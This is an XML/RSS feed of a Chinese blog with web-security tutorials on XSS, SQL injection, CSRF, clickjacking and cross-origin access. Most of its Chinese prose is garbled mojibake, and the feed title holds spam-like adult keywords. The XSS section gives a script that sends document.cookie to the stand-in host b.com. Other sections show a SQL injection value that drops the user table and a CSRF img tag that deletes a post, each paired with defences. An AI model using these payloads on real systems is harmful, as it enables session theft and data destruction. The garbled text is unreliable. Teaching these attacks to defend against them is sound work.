锘??xml version="1.0" encoding="utf-8" standalone="yes"?>亚洲电影中文字幕,亚洲а∨天堂久久精品,在线亚洲精品自拍http://blogjava.net/linli/category/54790.htmlhttp://blog.gopersist.com/zh-cnSat, 25 Apr 2015 22:41:43 GMTSat, 25 Apr 2015 22:41:43 GMT60Web瀹夊叏鎶鏈?4)-甯歌鐨勬敾鍑誨拰闃插盡http://www.tkk7.com/linli/archive/2015/04/25/424668.html鑰佹灄鑰佹灄Sat, 25 Apr 2015 07:40:00 GMThttp://www.tkk7.com/linli/archive/2015/04/25/424668.htmlhttp://www.tkk7.com/linli/comments/424668.htmlhttp://www.tkk7.com/linli/archive/2015/04/25/424668.html#Feedback0http://www.tkk7.com/linli/comments/commentRss/424668.htmlhttp://www.tkk7.com/linli/services/trackbacks/424668.html

瀵逛簬涓涓猈eb搴旂敤鏉ヨ錛屽彲鑳戒細(xì)闈復(fù)寰堝涓嶅悓鐨勬敾鍑匯備笅闈㈢殑鍐呭灝嗕粙緇嶄竴浜涘父瑙佺殑鏀誨嚮鏂規(guī)硶錛屼互鍙婇潰瀵硅繖浜涙敾鍑葷殑闃插盡鎵嬫銆?/p>

涓銆佽法绔欒剼鏈敾鍑伙紙XSS錛?/h2>

璺ㄧ珯鑴氭湰鏀誨嚮鐨勮嫳鏂囧叏縐版槸Cross Site Script錛屼負(fù)浜嗗拰鏍峰紡琛ㄥ尯鍒嗭紝緙╁啓涓篨SS銆傚彂鐢熺殑鍘熷洜鏄綉绔欏皢鐢ㄦ埛杈撳叆鐨勫唴瀹硅緭鍑哄埌欏甸潰涓婏紝鍦ㄨ繖涓繃紼嬩腑鍙兘鏈夋伓鎰忎唬鐮佽嫻忚鍣ㄦ墽琛屻?/p>

璺ㄧ珯鑴氭湰鏀誨嚮鍙互鍒嗕負(fù)涓ょ錛?/p>

1). 鍙嶅皠鍨媂SS

瀹冩槸閫氳繃璇變嬌鐢ㄦ埛鎵撳紑涓涓伓鎰忛摼鎺ワ紝鏈嶅姟绔皢閾炬帴涓弬鏁扮殑鎭舵剰浠g爜娓叉煋鍒伴〉闈腑錛屽啀浼犻掔粰鐢ㄦ埛鐢辨祻瑙堝櫒鎵ц錛屼粠鑰岃揪鍒版敾鍑葷殑鐩殑銆傚涓嬮潰鐨勯摼鎺ワ細(xì)

http://a.com/a.jsp?name=xss<script>alert(1)</script> 

a.jsp灝嗛〉闈㈡覆鏌撴垚涓嬮潰鐨刪tml錛?/p>

Hello xss<script>alert(1)</script> 

榪欐椂嫻忚鍣ㄥ皢浼?xì)寮瑰嚭鎻惤C烘銆?/p>

2). 鎸佷箙鍨媂SS

鎸佷箙鍨媂SS灝嗘伓鎰忎唬鐮佹彁浜ょ粰鏈嶅姟鍣紝騫朵笖瀛樺偍鍦ㄦ湇鍔″櫒绔紝褰撶敤鎴瘋闂浉鍏沖唴瀹規(guī)椂鍐嶆覆鏌撳埌欏甸潰涓紝浠ヨ揪鍒版敾鍑葷殑鐩殑錛屽畠鐨勫嵄瀹蟲洿澶с?/p>

姣斿錛屾敾鍑昏呭啓浜嗕竴綃囧甫鎭舵剰JS浠g爜鐨勫崥瀹紝鏂囩珷鍙戣〃鍚庯紝鎵鏈夎闂鍗氬鏂囩珷鐨勭敤鎴烽兘浼?xì)鎵ц杩檶D墊伓鎰廕S銆?/p>

Cookie鍔寔

Cookie涓竴鑸繚瀛樹簡褰撳墠鐢ㄦ埛鐨勭櫥褰曞嚟璇侊紝濡傛灉鍙互寰楀埌錛屽線寰鎰忓懗鐫鍙洿鎺ヨ繘鍏ョ敤鎴峰笎鎴鳳紝鑰孋ookie鍔寔涔熸槸鏈甯歌鐨刋SS鏀誨嚮銆備互涓婇潰鎻愯繃鐨勫弽灝勫瀷XSS鐨勪緥瀛愭潵璇達(dá)紝鍙互鍍忎笅闈㈣繖鏍鋒搷浣滐細(xì)

棣栧厛璇變嬌鐢ㄦ埛鎵撳紑涓嬮潰鐨勯摼鎺ワ細(xì)

http://a.com/a.jsp?name=xss<script src=http://b.com/b.js></script> 

鐢ㄦ埛鎵撳紑閾炬帴鍚庯紝浼?xì)鍔犺浇b.js錛屽茍鎵цb.js涓殑浠g爜銆俠.js涓瓨鍌ㄤ簡浠ヤ笅JS浠g爜錛?/p>

var img = document.createElement("img"); img.src = "http://b.com/log?" + escape(document.cookie); document.body.appendChild(img); 

涓婇潰鐨勪唬鐮佷細(xì)鍚慴.com璇鋒眰涓寮犲浘鐗囷紝浣嗗疄闄呬笂鏄皢褰撳墠欏甸潰鐨刢ookie鍙戝埌浜哹.com鐨勬湇鍔″櫒涓娿傝繖鏍峰氨瀹屾垚浜嗙獌鍙朿ookie鐨勮繃紼嬨?/p>

闃插盡Cookie鍔寔鐨勪竴涓畝鍗曠殑鏂規(guī)硶鏄湪Set-Cookie鏃跺姞涓奌ttpOnly鏍囪瘑錛屾祻瑙堝櫒紱佹JavaScript璁塊棶甯ttpOnly灞炴х殑Cookie銆?/strong>

XSS鐨勯槻寰?/h3>

1). 杈撳叆媯鏌?/strong>

瀵硅緭鍏ユ暟鎹仛媯鏌ワ紝姣斿鐢ㄦ埛鍚嶅彧鍏佽鏄瓧姣嶅拰鏁板瓧錛岄偖綆卞繀欏繪槸鎸囧畾鏍煎紡銆備竴瀹氳鍦ㄥ悗鍙板仛媯鏌ワ紝鍚﹀垯鏁版嵁鍙兘緇曡繃鍓嶇媯鏌ョ洿鎺ュ彂緇欐湇鍔″櫒銆備竴鑸墠鍚庣閮藉仛媯鏌ワ紝榪欐牱鍓嶇鍙互鎸℃帀澶ч儴鍒嗘棤鏁堟暟鎹?/p>

瀵圭壒孌婂瓧絎﹀仛緙栫爜鎴栬繃婊わ紝浣嗗洜涓轟笉鐭ラ亾杈撳嚭鏃剁殑璇錛屾墍浠ュ彲鑳戒細(xì)鍋氫笉閫傚綋鐨勮繃婊わ紝鏈濂芥槸鍦ㄨ緭鍑烘椂鍏蜂綋鎯呭喌鍏蜂綋澶勭悊銆?/p>

2). 杈撳嚭媯鏌?/strong>

瀵規(guī)覆鏌撳埌HTML涓唴瀹規(guī)墽琛孒tmlEncode錛屽娓叉煋鍒癑avaScript涓殑鍐呭鎵цJavascriptEncode銆?/p>

鍙﹀榪樺彲浠ヤ嬌鐢ㄤ竴浜涘仛XSS媯鏌ョ殑寮婧愰」鐩?/p>

浜屻丼QL娉ㄥ叆

SQL娉ㄥ叆甯稿父浼?xì)鍚垘图屽畠涓嶺SS綾諱技錛屾槸鐢變簬鐢ㄦ埛鎻愪氦鐨勬暟鎹褰撴垚鍛戒護(hù)鏉ユ墽琛岃岄犳垚鐨勩備笅闈㈡槸涓涓猄QL娉ㄥ叆鐨勪緥瀛愶細(xì)

String sql = "select * from user where username = '" + username + "'"; 

鍍忎笂闈㈢殑SQL璇彞錛屽鏋滅敤鎴鋒彁浜ょ殑username鍙傛暟鏄痩eo錛屽垯鏁版嵁搴撴墽琛岀殑SQL涓猴細(xì)

select * from user where username = 'leo' 

浣嗗鏋滅敤鎴鋒彁浜ょ殑username鍙傛暟鏄痩eo’; drop table user–錛岄偅鎵ц鐨凷QL涓猴細(xì)

select * from user where username = 'leo'; drop table user--' 

鍦ㄦ煡璇㈡暟鎹悗錛屽張鎵ц浜嗕竴涓垹闄よ〃鐨勬搷浣滐紝榪欐牱鐨勫悗鏋滈潪甯鎬弗閲嶃?/p>

SQL娉ㄥ叆鐨勯槻寰?/h3>

闃叉SQL娉ㄥ叆鏈濂界殑鏂規(guī)硶鏄嬌鐢ㄩ緙栬瘧璇彞錛屽涓嬮潰鎵紺猴細(xì)

String sql = "select * from user where username = ?"; PreparedStatement pstmt = conn.prepareStatement(sql); pstmt.setString(1, username); ResultSet results = pstmt.executeQuery(); 

涓嶅悓璇█鐨勯緙栬瘧鏂規(guī)硶涓嶅悓錛屼絾鍩烘湰閮藉彲浠ュ鐞嗐?/p>

濡傛灉閬囧埌鏃犳硶浣跨敤棰勭紪璇戞柟娉曟椂錛屽彧鑳藉儚闃叉XSS閭f牱瀵瑰弬鏁拌繘琛屾鏌ュ拰緙栫爜銆?/p>

涓夈佽法绔欒姹備吉閫狅紙CSRF錛?/h2>

璺ㄧ珯璇鋒眰浼犵殑鑻辨枃鍏ㄧО鏄疌ross Site Request Forgery錛屾槸鐢變簬鎿嶄綔鎵闇鐨勬墍鏈夊弬鏁伴兘鑳借鏀誨嚮鑰呭緱鍒幫紝榪涜屾瀯閫犲嚭涓涓吉閫犵殑璇鋒眰錛屽湪鐢ㄦ埛涓嶇煡鎯呯殑鎯呭喌涓嬭鎵ц銆傜湅涓嬮潰涓涓緥瀛愶細(xì)

濡傛灉a.com緗戠珯闇瑕佺敤鎴風(fēng)櫥褰曞悗鍙互鍒犻櫎鍗氬錛屽垹闄ゅ崥瀹㈢殑璇鋒眰鍦板潃濡備笅錛?/p>

GET http://a.com/blog/delete?id=1 

褰撶敤鎴風(fēng)櫥褰昦.com鍚庯紝鍙堟墦寮浜唄ttp://b.com/b.html錛屽叾涓湁涓嬮潰鐨勫唴瀹癸細(xì)

<img src="http://a.com/blog/delete?id=1"/> 

榪欐椂浼?xì)浠ョ敤鎴峰湪a.com鐨勮韓浠藉彂閫乭ttp://a.com/blog/delete?id=1錛屽垹闄ら偅綃囧崥瀹€?/p>

CSRF鐨勯槻寰?/h3>
  1. 楠岃瘉鐮?/li>

CSRF鏄湪鐢ㄦ埛涓嶇煡鎯呯殑鎯呭喌涓嬫瀯閫犵殑緗戠粶鎯呭喌錛岄獙璇佺爜鍒欏己鍒剁敤鎴蜂笌搴旂敤浜や簰錛屾墍浠ラ獙璇佺爜鍙互寰堝ソ寰楅槻姝SRF銆備絾涓嶈兘浠涔堣姹傞兘鍔犻獙璇佺爜銆?/p>

  1. referer媯鏌?/li>

媯鏌ヨ姹俬eader涓殑referer涔熻兘甯姪闃叉CSRF鏀誨嚮錛屼絾鏈嶅姟鍣ㄤ笉鏄昏兘鎷垮埌referer錛屾祻瑙堝櫒鍙兘鍑轟簬瀹夊叏鎴栭殣縐佽屼笉鍙戦乺eferer錛屾墍浠ヤ篃涓嶅父鐢ㄣ傚掓槸鍥劇墖闃茬洍閾句腑鐢ㄥ緱寰堝銆?/p>

  1. Anti CSRF Token

鏇村鐨勬槸鐢熸垚涓涓殢鏈虹殑token錛屽湪鐢ㄦ埛鎻愪氦鏁版嵁鐨勫悓鏃舵彁浜よ繖涓猼oken錛屾湇鍔″櫒绔瘮瀵瑰悗濡傛灉涓嶆紜紝鍒欐嫆緇濇墽琛屾搷浣溿?/p>

鍥涖佺偣鍑誨姭鎸侊紙ClickJacking錛?/h2>

鐐瑰嚮鍔寔鏄粠瑙嗚涓婃楠楃敤鎴楓傛敾鍑昏呬嬌鐢ㄤ竴涓忔槑鐨刬frame瑕嗙洊鍦ㄤ竴涓綉欏典笂錛岃浣跨敤鎴峰湪璇ョ綉欏典笂鎿嶄綔錛岃屽疄闄呯偣鍑誨嵈鏄偣鍦ㄩ忔槑鐨刬frame欏甸潰銆?/p>

鐐瑰嚮鍔寔寤朵幾鍑轟簡寰堝鏀誨嚮鏂瑰紡錛屾湁鍥劇墖瑕嗙洊鏀誨嚮銆佹嫋鎷藉姭鎸佺瓑銆?/p>

鐐瑰嚮鍔寔鐨勯槻寰?/h3>

閽堝iframe鐨勬敾鍑伙紝鍙嬌鐢ㄤ竴涓狧TTP澶達(dá)細(xì)X-Frame-Options錛屽畠鏈変笁縐嶅彲閫夊鹼細(xì)

  • DENY錛?紱佹浠諱綍欏甸潰鐨刦rame鍔犺澆錛?/li>
  • SAMEORIGIN錛氬彧鏈夊悓婧愰〉闈㈢殑frame鍙姞杞斤紱
  • ALLOW-FROM錛氬彲瀹氫箟鍏佽frame鍔犺澆鐨勯〉闈㈠湴鍧銆?/li>

閽堝鍥劇墖瑕嗙洊鏀誨嚮錛屽垯娉ㄦ剰浣跨敤棰勯槻XSS鐨勬柟娉曪紝闃叉HTML鍜孞S娉ㄥ叆銆?/p>

寰俊璁㈤槄鍙鳳細(xì)
鍘熸枃鍦板潃錛?a title="http://blog.gopersist.com/2015/04/25/web-security-4/">http://blog.gopersist.com/2015/04/25/web-security-4/



鑰佹灄 2015-04-25 15:40 鍙戣〃璇勮
]]>
Web瀹夊叏鎶鏈?3)-嫻忚鍣ㄧ殑璺ㄥ煙璁塊棶http://www.tkk7.com/linli/archive/2015/04/22/424584.html鑰佹灄鑰佹灄Tue, 21 Apr 2015 16:15:00 GMThttp://www.tkk7.com/linli/archive/2015/04/22/424584.htmlhttp://www.tkk7.com/linli/comments/424584.htmlhttp://www.tkk7.com/linli/archive/2015/04/22/424584.html#Feedback4http://www.tkk7.com/linli/comments/commentRss/424584.htmlhttp://www.tkk7.com/linli/services/trackbacks/424584.html

涓銆佹祻瑙堝櫒浠嬬粛

瀵逛簬Web搴旂敤鏉ヨ錛屾祻瑙堝櫒鏄渶閲嶈鐨勫鎴風(fēng)銆?/p>

鐩墠嫻忚鍣ㄤ簲鑺卞叓闂ㄥ寰椾笉寰椾簡錛岄櫎浜咰hrome銆両E銆丗irefox銆丼afari銆丱pera榪欎簺鍥藉鐨勬祻瑙堝櫒澶栵紝鐧懼害銆佽吘璁?60銆佹窐瀹濄佹悳鐙椼佸偛娓鎬箣綾葷殑錛屽弽姝h兘鍋氱殑閮藉仛浜嗐?/p>

嫻忚鍣ㄨ櫧鐒惰繖涔堝錛屼絾嫻忚鍣ㄥ唴鏍鎬富瑕佸氨浠ヤ笅4縐嶏細(xì)

  1. Trident錛欼E浣跨敤鐨勫唴鏍搞?/li>
  2. Gecko錛欶irefox浣跨敤鐨勫唴鏍搞?/li>
  3. WebKit錛歋afair鍜孋hrome浣跨敤鐨勫唴鏍搞俉ebKit鐢辮嫻鏋滃彂鏄庯紝Chrome涔熺敤浜嗭紝浣嗘槸Google鍙堝紑鍙戜簡V8寮曟搸鏇挎崲鎺変簡WebKit涓殑Javascript寮曟搸銆?/li>
  4. Presto錛歄pera浣跨敤鐨勫唴鏍搞?/li>

鍥藉唴鐨勬祻瑙堝櫒鍩烘湰閮芥槸鍙屾牳嫻忚鍣紝浣跨敤鍩轟簬WebKit鐨勫唴鏍擱珮閫熸祻瑙堝父鐢ㄧ綉绔欙紝浣跨敤Trident鍐呮牳鍏煎緗戦摱絳夌綉绔欍?/p>

浜屻佸悓婧愮瓥鐣?/h2>

鍚屾簮絳栫暐鏄祻瑙堝櫒鏈鍩烘湰鐨勫畨鍏ㄧ瓥鐣ワ紝瀹冭涓轟換浣曠珯鐐圭殑鍐呭閮芥槸涓嶅畨鍏ㄧ殑錛屾墍浠ュ綋鑴氭湰榪愯鏃訛紝鍙鍏佽璁塊棶鏉ヨ嚜鍚屼竴绔欑偣鐨勮祫婧愩?/p>

鍚屾簮鏄寚鍩熷悕銆佸崗璁佺鍙i兘鐩稿悓銆?/p>

濡傛灉娌℃湁鍚屾簮絳栫暐錛屽氨浼?xì)鍙戠敓涓嬮潰杩欐狅L(fēng)殑闂錛?/p>

鎭舵剰緗戠珯鐢ㄤ竴涓猧frame鎶婄湡瀹炵殑閾惰鐧誨綍欏墊斁鍒頒粬鐨勯〉闈笂錛屽綋鐢ㄦ埛浣跨敤鐢ㄦ埛鍚嶅瘑鐮佺櫥褰曟椂錛岀埗欏甸潰鐨刯avascript灝卞彲浠ヨ鍙栧埌閾惰鐧誨綍欏佃〃鍗曚腑鐨勫唴瀹廣?/p>

鐢氳嚦嫻忚鍣ㄧ殑1涓猅ab欏墊墦寮浜嗘伓鎰忕綉绔欙紝鍙︿竴涓猅ab欏墊墦寮浜嗛摱琛岀綉绔欙紝鎭舵剰緗戠珯涓殑javascript鍙互璇誨彇鍒伴摱琛岀綉绔欑殑鍐呭銆傝繖鏍烽摱琛屽崱鍜屽瘑鐮佸氨鑳借杞繪槗鎷胯蛋銆?/p>

涓夈佽法鍩熻闂?/h2>

鐢變簬鍚屾簮絳栫暐鐨勫師鍥狅紝嫻忚鍣ㄥ璺ㄥ煙璁塊棶鍋氫簡寰堝闄愬埗錛屼絾鏈夋椂鎴戜滑鐨勭‘闇瑕佸仛璺ㄥ煙璁塊棶錛岄偅瑕佹庝箞鍔烇紵涓昏鏈変互涓嬪嚑縐嶆儏鍐碉細(xì)

1. iframe鐨勮法鍩熻闂?/h3>

鍚屽煙鍚嶄笅錛岀埗欏甸潰鍙互閫氳繃document.getElementById(‘_iframe’).contentWindow.document璁塊棶瀛愰〉闈㈢殑鍐呭錛屼絾涓嶅悓鍩熷悕涓嬩細(xì)鍑虹幇綾諱技涓嬮潰鐨勯敊璇細(xì)

Uncaught SecurityError: Blocked a frame with origin “http://a.com” from accessing a frame with origin “http://b.com”. Protocols, domains, and ports must match.

鏈変袱縐嶈В鍐蟲柟娉曪細(xì)

1). 褰撲富鍩熷悕鐩稿悓錛屽瓙鍩熷悕涓嶅悓鏃訛紝姣旇緝瀹規(guī)槗瑙e喅錛屽彧闇璁劇疆鐩稿悓鐨刣ocument.domain鍗沖彲銆?/p>

濡俬ttp://a.a.com/a.html浣跨敤iframe杞藉叆http://b.a.com/b.html錛屼笖鍦╝.html涓湁Javascript瑕佷慨鏀筨.html涓厓绱犵殑鍐呭鏃訛紝鍙互鍍忎笅闈㈢殑浠g爜閭f牱鎿嶄綔銆?/p>

a.html

<html>
<head>
<script>
document.domain = 'a.com';
function changeIframeContent() {
var _iframe = document.getElementById('_iframe');
var _p = _iframe.contentWindow.document.getElementById('_p');
_p.innerHTML = 'Content from a.html';
}
</script>
</head>
<body>
<iframe id="_iframe" src="http://b.a.com/demo/iframe/subdomain/b.html"></iframe>
<br>
<input type="button" value="Change iframe content" onclick="changeIframeContent();"/>
</body>
</html>

b.html

<html>
<head>
<script>
document.domain = 'a.com';
</script>
</head>
<body>
<p id="_p">b.html</p>
</body>
</html>

2). 褰撲富鍩熷悕涓嶅悓鏃訛紝灝遍潪甯擱夯鐑︿簡銆傚ぇ鑷寸殑鏂規(guī)硶鍍忎笅闈㈡弿榪扮殑閭f牱錛?/p>

  • a.com涓嬫湁a.html錛?/li>
  • a.html鍒涘緩iframe鍔犺澆b.com涓嬬殑b.html錛屽彲鍦ㄥ姞杞絙.html鏃墮氳繃?鎴?灝嗗弬鏁頒紶閫掑埌b.html涓紱
  • b.html鍔犺澆鍚庯紝鍙互閫氳繃鎻愬彇location.search鎴杔ocation.hash涓殑鍐呭鑾峰彇a.html浼犺繃鏉ョ殑鍙傛暟錛?/li>
  • b.html鍒涘緩涓涓猧frame錛屽姞杞絘.com涓嬬殑c.html錛屽茍涓斿弬鏁頒篃閫氳繃?鎴?浼犵粰c.html錛?/li>
  • 鍥犱負(fù)c.html鍜宎.html鏄浉鍚屽煙鍚嶏紝鎵浠.html鍙互浣跨敤parent.parent璁塊棶鍒癮.html鐨勫璞★紝榪欐牱涔熷氨鍙互灝哹.html闇瑕佷紶閫掔殑鍙傛暟浼犲洖鍒癮.html涓?/li>

2. Ajax鐨勮法鍩熻闂?/h3>

Ajax涓昏閫氳繃XMLHttpRequest瀵硅薄瀹炵幇錛屼絾鏄鏋滈氳繃XMLHttpRequest璁塊棶涓嶅悓鍩熷悕涓嬬殑鏁版嵁錛屾祻瑙堝櫒浼?xì)鍑虹幇绫讳奸g笅闈㈢殑閿欒錛?/p>

XMLHttpRequest cannot load http://b.com/demo/iframe/ajax/b.html. No ‘Access-Control-Allow-Origin’ header is present on the requested resource. Origin ‘http://a.com’ is therefore not allowed access.

榪欐椂鍙敱浠ヤ笅涓ょ鏂規(guī)硶瑙e喅錛?/h4>

1). 浣跨敤<script>浠f浛XMLHttpRequest錛屼篃灝辨槸JSONP鐨勬柟娉曘傚埄鐢?lt;script>鏍囩鐨剆rc涓嬪姞杞界殑js涓嶅彈鍚屾簮絳栫暐闄愬埗錛屽茍涓斿姞杞藉悗鐨刯s榪愯鍦ㄥ綋鍓嶉〉闈㈢殑鍩熶笅錛屾墍浠ュ彲鑷敱鎿嶄綔褰撳墠欏甸潰鐨勫唴瀹廣?/p>

涓嬮潰鐨勪唬鐮佹紨紺轟簡鍦╝.com涓嬬殑a.html閫氳繃b.com涓嬬殑b.js涓殑鍐呭鏉ユ洿鏂拌嚜韜殑p鏍囩銆?/p>

a.html

<html>
<head>
<script>
function update_p (content) {
document.getElementById("_p").innerHTML = content;
}
function getFromB() {
var _script = document.createElement("script");
_script.type = "text/javascript";
_script.src = "http://b.com/demo/ajax/b.js";
document.getElementsByTagName("head")[0].appendChild(_script);
}
</script>
</head>
<body>
<p id="_p">a.html</p>
<input type="button" value="Get from b.com" onclick="getFromB()"/>
</body>
</html>

b.js

update_p("content from b.js"); 

鍦ㄥ疄闄呬嬌鐢ㄤ腑錛岄氬父a.html浼?xì)灏唘pdate_p浠allback鍙傛暟鍚嶄紶閫掔粰b.com鐨勬湇鍔″櫒錛屾湇鍔″櫒鍔ㄦ佺敓鎴愭暟鎹悗錛屽啀鐢╟allback鍙傛暟鍊煎寘璧鋒潵浣滀負(fù)鍝嶅簲鍥炰紶緇檃.html銆?/p>

2). 鍦╞.com鐨勬湇鍔″櫒榪斿洖淇℃伅涓鍔犱互涓嬪ご淇℃伅錛?/p>

  • Access-Control-Allow-Origin: http://a.com
  • Access-Control-Allow-Methods: GET

姝ゆ椂嫻忚鍣ㄤ究鍏佽a.com璇誨彇浣跨敤GET璇鋒眰b.com鐨勫唴瀹廣?/p>

瀵逛簬flash鏉ヨ錛屼細(xì)瑕佹眰鍦ㄧ綉绔欐牴鐩綍涓嬫斁涓涓悕涓篶rossdomain.xml鐨勬枃浠訛紝浠ユ寚鏄庡厑璁歌闂殑鍩熷悕鏉ユ簮銆傛枃浠朵腑鐨勫唴瀹圭被浼間笅闈㈢殑鏍峰瓙錛?/em>

<cross-domain-policy>
<allow-access-from domain="*.a.com" />
</cross-domain-policy>

3. 浣跨敤HTML5鐨刾ostMessage鏂規(guī)硶瀹炵幇璺ㄥ煙璁塊棶

HTML5澧炲姞浜嗚法鏂囨。娑堟伅浼犺緭錛屼笅闈㈢殑渚嬪瓙瀹炵幇浜嗕嬌鐢╬ostMessage鍦ㄤ笉鍚屽煙闂翠紶閫掓秷鎭細(xì)

a.html

<html>
<head>
<script>
function update_b () {
var _iframe = document.getElementById("_iframe");
_iframe.contentWindow.postMessage("content from a.html", "http://b.com");
}
</script>
<head>
<body>
<iframe id="_iframe" src="http://b.com/demo/html5/b.html"></iframe>
<br>
<input type="button" value="Update b.html" onclick="update_b()"></input>
</body>
</html>

b.html

<html>
<head>
<script>
window.addEventListener("message", function (event) {
document.getElementById("_p").innerHTML = event.data;
}, false);
</script>
</head>
<body>
<p id="_p">b.html</p>
</body>
</html>

鍦╬ostMessage涓鎸囧畾鎺ユ敹鏂圭殑鍩熷悕錛屽鏋滃彂鐜扮洰鏍囬〉闈㈢殑鍩熷悕涓嶆紜紝灝嗘姏鍑虹被浼間笅闈㈣繖鏍風(fēng)殑閿欒錛?/p>

Failed to execute ‘postMessage’ on ‘DOMWindow’: The target origin provided (‘http://c.com’) does not match the recipient window’s origin (‘http://b.com’).

嫻忚鍣ㄥ璺ㄥ煙璁塊棶鐨勯檺鍒舵槸鍑轟簬瀹夊叏鑰冭檻鐨勶紝鎵浠ュ湪浣跨敤涓浜涙柟娉曞疄鐜拌法鍩熻闂椂瑕佺壒鍒皬蹇冦?/em>

寰俊璁㈤槄鍙鳳細(xì)
婧愭枃鍦板潃錛?a >http://blog.gopersist.com/2015/04/22/web-security-3/



鑰佹灄 2015-04-22 00:15 鍙戣〃璇勮
]]>
Web瀹夊叏鎶鏈?2)-瀹夊叏姒傝堪http://www.tkk7.com/linli/archive/2015/04/17/424507.html鑰佹灄鑰佹灄Fri, 17 Apr 2015 15:47:00 GMThttp://www.tkk7.com/linli/archive/2015/04/17/424507.htmlhttp://www.tkk7.com/linli/comments/424507.htmlhttp://www.tkk7.com/linli/archive/2015/04/17/424507.html#Feedback0http://www.tkk7.com/linli/comments/commentRss/424507.htmlhttp://www.tkk7.com/linli/services/trackbacks/424507.html涓銆佸畨鍏ㄧ殑瑕佺礌

淇℃伅瀹夊叏鐨勬牳蹇冮棶棰樻槸瑕佷繚闅滄暟鎹殑鍚堟硶浣跨敤鑰呰兘澶熷湪浠諱綍闇瑕佽鏁版嵁鏃惰幏寰椾繚瀵嗙殑錛屾病鏈夎闈炴硶鏇存敼榪囩殑鏁版嵁銆備富瑕佹湁浠ヤ笅鍑犺绱狅細(xì)

鏈哄瘑鎬?/p>

  • 淇濊瘉鏁版嵁鍐呭涓嶈兘娉勯湶銆?/li>
  • 鐢ㄦ埛鐨勫瘑鐮佺敤鏄庢枃淇濆瓨錛屽氨鐮村潖浜嗘満瀵嗘с?/em>

瀹屾暣鎬?/p>

  • 淇濊瘉鏁版嵁鍐呭涓嶈綃℃敼銆?/li>
  • 浣跨敤HTTP鎻愪氦鏁版嵁鏃訛紝鏁版嵁鍦ㄤ紶杈撹繃紼嬩腑琚鏀瑰悗鍐嶅彂寰鏈嶅姟鍣紝灝辯牬鍧忎簡瀹屾暣鎬с?/em>

鍙敤鎬?/p>

  • 淇濊瘉鏁版嵁鍙姝e父璁塊棶鍜屼嬌鐢ㄣ?/li>
  • 鍍忔嫆緇濇湇鍔℃敾鍑伙紙DoS錛夊氨鏄牬鍧忎簡鍙敤鎬с?/em>

鏈鍩烘湰鐨勫畨鍏ㄨ绱犲氨涓婇潰涓変釜錛屼笅闈㈣繕鏈変竴浜涘叾浠栫殑銆?/strong>

鍙璁℃?/p>

  • 璁板綍瀵規(guī)暟鎹駭鐢熺殑鎿嶄綔錛岀敤浜庢棩鍚庣殑鍒嗘瀽銆佸鏌ャ?/li>

涓嶅彲鎶佃禆鎬?/p>

  • 棣栧厛瑕佷繚璇佹暟鎹畬鏁存э紝鐒跺悗錛屽湪浼犺緭鐨勬暟鎹腑蹇呴』鎼哄甫鐢ㄤ簬韜喚璇嗗埆鐨勪俊鎭紝涓旇繖閮ㄥ垎淇℃伅鍦ㄤ笉鍚屼富浣撻棿涓嶈兘鍙戠敓紕版挒銆?/li>

鍔犲瘑鎶鏈殑浣跨敤

涓婁竴綃?a style="color: #1756a9; text-decoration: none;">銆奧eb瀹夊叏鎶鏈?1)-瀵瑰姞瀵嗘満鍒剁殑鐞嗚В銆?/a>涓彁鍒頒簡涓夌被鍔犲瘑綆楁硶錛屽彲浠ュ簲鐢ㄤ簬鏌愪簺瑕佺礌鐨勫畨鍏ㄤ繚闅溿傚涓嬮潰鐨勮鏄庯細(xì)

瀵圭О鍔犲瘑

  • 鍙繚闅滄満瀵嗘э紝瀵規(guī)暟鎹姞瀵嗗悗瀛樺偍錛屽彲浠ヤ嬌娌℃湁瀵嗛挜鐨勪漢鍛樻棤娉曡幏鍙栨暟鎹唴瀹廣?/li>

闈炲縐板姞瀵?/strong>

  • 鍙互瀵規(guī)暟鎹繘琛屽姞瀵嗚В瀵嗘搷浣滐紝鎵浠ヤ篃鑳藉儚瀵圭О鍔犲瘑涓鏍蜂繚闅滄満瀵嗘э紱
  • 鍥犱負(fù)闈炲縐板姞瀵嗗彲浠ュ疄鐜版暟瀛楃鍚嶏紝鎵浠ュ彲浠ヤ繚璇佹暟鎹畬鏁存с傚彟澶栵紝鐢變簬鏄嬌鐢ㄧ閽ョ鍚嶏紝鑰岀閽ュ彧鏈夋暟鎹彂閫佹柟鎵嶆湁錛屾墍浠ュ鏋滃叕閽ュ彲浠ラ獙絳炬垚鍔燂紝鍒欏彂閫佹柟涓嶅彲鎶佃禆銆?/li>

鎽樿鍔犲瘑

  • 鎽樿綆楁硶鍙繚闅滄暟鎹畬鏁存с?/p>

  • 鍦ㄦ煇浜涚綉绔欑殑杞歡涓嬭澆欏甸潰閲岋紝鏈夋椂闄や簡涓嬭澆鍦板潃錛屾梺杈硅繕浼?xì)鏈変竴涓狹D5鐮併傝繖涓狹D5灝辨槸瀵逛笅杞界殑杞歡鍋氱殑鎽樿鍔犲瘑銆傚湪涓嬭澆瀹屾垚鍚庯紝鍦ㄦ湰鏈哄涓嬭澆鐨勮蔣浠跺仛MD5錛岀劧鍚庡拰緗戠珯涓婃樉紺虹殑MD5鍋氭瘮杈冿紝濡傛灉鐩稿悓灝辮〃紺鴻蔣浠惰鎴愬姛涓嬭澆錛岃屼笖涓嬭澆榪囩▼涓蔣浠跺唴瀹規(guī)病鏈夎綃℃敼銆?/em>
  • 鍦ㄥ仛緋葷粺鏃訛紝鎴戜滑涔熺粡甯鎬細(xì)瀵瑰瘑鐮佸仛鎽樿鍔犲瘑鍚庡啀淇濆瓨錛屽洜涓烘憳瑕佸姞瀵嗙殑涓涓壒鎬ф槸涓嶅彲閫嗭紝榪欐牱閫氳繃鏁版嵁搴撲腑淇濆瓨鐨勫姞瀵嗗悗鐨勫瘑鐮佷笉鍙兘榪樺師鎴愮敤鎴風(fēng)殑鐪熷疄瀵嗙爜銆傝岀敤鎴風(fēng)櫥褰曟椂錛屽彧闇灝嗙敤鎴鋒彁浜ょ殑瀵嗙爜鍐嶅仛鎽樿鍔犲瘑錛岀劧鍚庝笌鏁版嵁搴撲腑淇濆瓨鐨勫瘑鐮佹瘮杈冿紝灝辮兘鍒ゆ柇鐢ㄦ埛鏈夋病鏈夎緭鍏ユ紜殑瀵嗙爜銆?/em>

浜屻侀闄╁垎鏋?/h2>

瀵逛簬鏁版嵁鍙兘浼?xì)閬囧堫C粈涔堝▉鑳侊紝涓鑸槸鎷嶈剳琚嬫兂涓鎯籌紝涔熷彲浠ヤ嬌鐢ㄦā鍨嬪府蹇欙紝涓嬮潰鏄竴涓彨STRIDE鐨勫▉鑳佹ā鍨嬶細(xì)

濡備綍璇勪及椋庨櫓錛?/h3>

